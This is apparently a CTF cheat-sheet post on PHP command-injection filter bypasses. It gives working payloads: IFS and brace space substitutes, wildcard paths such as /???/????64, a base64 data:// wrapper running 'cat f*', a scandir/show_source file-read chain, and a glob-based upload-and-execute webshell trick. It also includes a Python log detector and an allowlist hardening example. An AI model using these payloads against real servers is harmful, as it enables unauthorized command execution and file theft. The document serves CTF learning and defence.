Some miscellaneous notes on CTF command execution vulnerabilities
Command execution vulnerabilities are mainly caused by functions such as system, exec, shell_exec, eval, etc., which execute user-supplied content as a command. Backticks behave much like system: whatever is placed inside them is executed as a command. // Note that among these command execution functions only system prints the command output directly; the others return it and must be combined with echo to display it.
Some notes on filtering
Generally, when I see one, I probe it directly with:
echo "npfs "; include($_GET['url']); ?>&url=php://filter/read=convert.base64-encode/resource=flag.php
eval(system('cat flag.php'));
The system in this code can be replaced by backticks. If cat is filtered, replace it with another command that can read flag.php, for example nl. If flag.php is filtered as well, split the name and join it back together, for example f''l''a''g.php, or use wildcards such as f* or f?ag.php.
Some ways to bypass
Space bypass
> < <> redirection operators // note: when using <> together with the ? wildcard there is no output; use \ instead
// for example tac<>fla?.php must be changed to tac<>fla\g.php
%09 (requires a PHP environment)
${IFS}
$IFS$9
{cat,flag.php} // the comma takes the place of the space
%20
%09
/**/ (generally used in SQL injection)
If cat is filtered
more: displays file contents one page at a time
less: similar to more
head: shows the first few lines
tac: displays from the last line backwards, i.e. cat in reverse
tail: shows the last few lines
nl: displays the file and prints line numbers alongside
od: reads the file contents as a binary (octal) dump
vi: an editor, which can also be used to view a file
vim: an editor, which can also be used to view a file
sort: can be used to view a file
uniq: can be used to view a file
file -f: leaks the actual contents through its error message
grep
strings
Use of grep
grep test *file # in the current directory, search the files whose names end in "file" for the string test and print the matching lines
Functions without parentheses (php)
echo qwer;
print qwe;
die;
include "/dasdasda";
require "/asdasdas";
include_once "/asdasd";
require_once "/aaaaaa";
The two wrappers (protocols) I use most often
php://filter/
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZioiKTs=
Try these two when the items above are unavailable.
What if you still can't get it out?
https://www.cnblogs.com/NPFS/p/13778333.html
Go and read this write-up on parameterless file reading by that expert.
After reading it you will know the magic of scandir(current(localeconv())) (I have to say, standing on the shoulders of giants really is convenient).
Here is a challenge where this can be used.
In this challenge, after all the methods above have been tried and found useless, scandir(current(localeconv())) is used to list the files.
print_r(scandir(current(localeconv())));
After seeing flag.php we want to open it, but what do we do if digits cannot appear?
Of course, reverse the array with array_reverse, then use next() to read the next value, and the flag.php file is read successfully.
Payload: show_source(next(array_reverse(scandir(pos(localeconv())))));
If other functions are concatenated before or after the input of the command execution function, affecting what we execute, use a command separator:
; // semicolon
| // only the command after it is executed
|| // only the command before it is executed
& // both commands are executed
&& // both commands are executed
%0a
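From the defender's side, the space substitutes, command separators and wrappers listed in the sections above are exactly the strings a WAF or log review should be looking for. The following detector is an added example, not part of these notes: it URL-decodes every query parameter in a web-server access log and reports which of the listed indicators fire. The log lines are constructed for the example and are not real traffic; the indicator names and the helper functions are my own choices.

```python
import re
from urllib.parse import unquote, urlsplit

# Indicators taken from the bypass lists in these notes: space substitutes
# (${IFS}, $IFS$9, %09, {a,b}, redirection), command separators, the php://
# and data:// wrappers, and wildcard-only paths such as /???/????64.
# Each pattern is applied to the URL-decoded value of every query parameter.
INDICATORS = {
    "ifs_space":      re.compile(r"\$\{IFS\}|\$IFS(\$\d)?"),
    "brace_space":    re.compile(r"\{[^{}\s]+,[^{}\s]+\}"),   # {cat,flag.php}
    "tab_or_newline": re.compile(r"[\t\n]"),                  # %09 / %0a
    "redirect_space": re.compile(r"\w<>?\w|\w>\w"),           # tac<>flag.php
    "separator":      re.compile(r";|\|\|?|&&?"),
    "php_wrapper":    re.compile(r"\b(php|data)://", re.I),
    "wildcard_path":  re.compile(r"(^|[\s/])[?*]{2,}"),       # /???/????64
}

# Constructed sample access-log lines (not real traffic) in the common
# "client - - [time] \"METHOD path HTTP/1.1\" status bytes" layout.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?c=cat$%7BIFS%7Dflag.php HTTP/1.1" 200 128
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?c=%7Bcat,flag.php%7D HTTP/1.1" 200 128
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?url=php://filter/read=convert.base64-encode/resource=flag.php HTTP/1.1" 200 900
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?c=ls%0atac%09flag.php HTTP/1.1" 200 64
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?c=/???/????64%20????.??? HTTP/1.1" 200 64
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?c=tac%3C%3Efla%5Cg.php HTTP/1.1" 200 64
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) ')


def query_values(query):
    """Split a raw query string on '&' first, then decode each key and value.

    Splitting before decoding means an encoded %26 inside a value survives
    as a literal '&' and can be flagged as a separator."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        yield unquote(key), unquote(value)


def scan_request_path(path):
    """Return the sorted list of indicator names that fire on any parameter of `path`."""
    hits = set()
    for key, value in query_values(urlsplit(path).query):
        for text in (key, value):
            decoded = unquote(text)  # second decode catches double-encoded payloads
            for label, pattern in INDICATORS.items():
                if pattern.search(decoded):
                    hits.add(label)
    return sorted(hits)


def scan_log(text):
    """Map each suspicious request path to its indicators; benign lines are omitted."""
    findings = {}
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        hits = scan_request_path(m.group("path"))
        if hits:
            findings[m.group("path")] = hits
    return findings


if __name__ == "__main__":
    for path, hits in scan_log(SAMPLE_LOG).items():
        print(f"{', '.join(hits):<16} {path}")
```

The decode-after-split order matters: the web server has already turned %26 into a literal `&` by the time system() sees it, so the detector must do the same before matching, while still treating the raw `&` in the URL as a parameter boundary.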
Other operations
Because Linux commands support wildcards, if a lot of characters are filtered you can use this feature to bypass the filter.
<?php
// Are you all showing off?
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}
This one can use /bin/base64 to view the flag, for example
c=/???/????64%20????.???
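The lesson for anyone writing the filter rather than bypassing it is that a character blocklist cannot enumerate what the shell will interpret. The block below is an added example, not code from these notes or from the challenge: it transcribes the preg_match blocklist above into Python's re so that the gap can be checked against the page's own payload, and puts it next to an allowlist dispatcher that closes the hole by never handing user input to a shell at all. The two permitted actions (uptime and date) are an assumption made for the example.

```python
import re
import subprocess
from urllib.parse import unquote

# The challenge's blocklist transcribed from preg_match: /i becomes re.I,
# \x09 is a tab and \x26 is '&'.
BLOCKLIST = re.compile(r";|[a-z]|`|%|\x09|\x26|>|<", re.I)

# The payload given in the notes, as system() sees it after the web server
# URL-decodes %20 to a space.
PAGE_PAYLOAD = unquote("/???/????64%20????.???")


def blocklist_allows(c):
    """Mirror of `!preg_match(...)`: True when the string would reach system()."""
    return BLOCKLIST.search(c) is None


# Hardened replacement. Assumption for this example: the page only ever needs
# these two actions. The client picks an action name; the argv is fixed here
# and executed without a shell, so separators, globs and $IFS are never
# interpreted, and anything not in the table is simply rejected.
ALLOWED_ACTIONS = {
    "uptime": ["uptime"],
    "date":   ["date", "-u"],
}


def allowlist_dispatch(c, run=subprocess.run):
    """Run the fixed argv for a permitted action and return it; None if rejected."""
    argv = ALLOWED_ACTIONS.get(c)
    if argv is None:
        return None
    run(argv, shell=False, check=False, capture_output=True)  # argv list, no shell
    return argv


if __name__ == "__main__":
    print("blocklist stops 'cat flag.php':", not blocklist_allows("cat flag.php"))
    print("blocklist stops page payload:  ", not blocklist_allows(PAGE_PAYLOAD))
    print("allowlist accepts page payload:", allowlist_dispatch(PAGE_PAYLOAD) is not None)
    print("allowlist runs 'date':         ", allowlist_dispatch("date"))
```

The `run` parameter exists only so the dispatcher can be exercised without actually executing anything; in production it stays at its default.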
There is also the non-alphanumeric webshell improvement learned from God P.
It mainly uses the shell to execute an arbitrary script, with Linux file-name globbing standing in for the characters we cannot type.
The file we upload is saved by default as /tmp/phpXXXXXX, where the last six characters are random upper- and lower-case letters.
The wildcard range [@-[]
is used to represent capital letters.
<?php
// Are you all showing off?
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}
So let's begin, following God P's method:
- First construct an HTML page that POSTs a file upload
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>POST文件上传</title>
</head>
<body>
<form action="http://17d01aae-51d9-48fe-abfb-d9ba10037d72.chall.ctf.show/" method="post" enctype="multipart/form-data">
<!-- the link is the URL of the currently opened challenge -->
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
- Upload a PHP file whose content is:
#!/bin/sh
ls
- Then capture the upload request with a proxy and append
c=./???/????????[@-[]
to it.
There is also a trick for constructing numbers:
${_} = ""
$((${_})) = 0
$((~$((${_})))) = -1
Use these to build up the number we want.